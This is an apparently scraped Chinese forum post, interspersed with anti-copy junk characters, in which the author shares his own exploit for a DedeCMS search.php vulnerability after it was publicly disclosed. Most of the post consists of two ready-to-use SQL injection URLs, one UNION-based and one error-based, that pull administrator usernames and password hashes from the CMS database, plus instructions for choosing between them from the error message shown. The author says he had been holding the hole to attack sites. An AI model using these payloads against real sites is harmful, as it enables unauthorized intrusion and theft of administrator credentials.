转载不加作者名的没JJ" @4 i, @8 h/ J3 o( Y3 v! s! ~3 ^
& F1 |% [- A9 a1 e
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。. @. W& T# Q' S* V( {& m* a
, y% E2 {; v( k; ]既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& W) m. N+ |# Z4 l
) E: m0 \6 y' n/ d我一般是这样测试的:
# ?' I9 L/ n2 p8 R l3 o+ j1 q$ }3 U6 ]1 E$ s9 l" s
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a1 A' }5 h6 q( T2 b
1 ?% J8 D6 k& S) D, U; q7 M转载不加作者名的没JJ
& Z+ s* f% I; @7 m! l- n0 e! i1 E3 I6 {, B w
作者:鬼哥* f3 o8 _% v3 ]1 z9 L
3 x5 h/ L0 q5 _) H ' Q( b3 G" p. T4 z4 B
5 k) ]; s% g$ p' s# j看结果如果提示" \% \) ]! L* r, f' o
: L1 h! S' f5 p, KSafe Alert: Request Error step 2 !
+ `; n* W g9 F g( \! j/ k/ k/ I; {8 U
那么直接用下面的exp& q* x0 S% I2 q8 p( k
! w( b2 _1 S' W3 @* H, J8 Lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
. w4 W8 f& @# Y, H. Y+ c9 a/ @* A5 {$ n$ y- W* @; B# `
* s! b5 ~8 z. R* I9 [" D/ {看结果如果提示
t/ J4 \6 {: c1 w ?, ~
+ g% R) ~8 t4 ^; iSafe Alert: Request Error step 1 !2 {- \, w7 `5 a# M6 e' _
: P0 Q! k) R, M, a& u, O那么直接用下面的exp
' Q; b$ ]" W4 `0 |( V' g
v: F) S$ c+ mxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a+ Q. ]4 ^1 Q3 a0 x3 F# g. [" ?
0 A! `8 r6 V- M5 N4 |# \/ M4 B* J8 P4 p8 [
如果正常显示证明漏洞不存在了。
% r9 ~' {5 t& d2 g+ p) h' J8 _( M" ~% N! m
转载不加作者名的没JJ |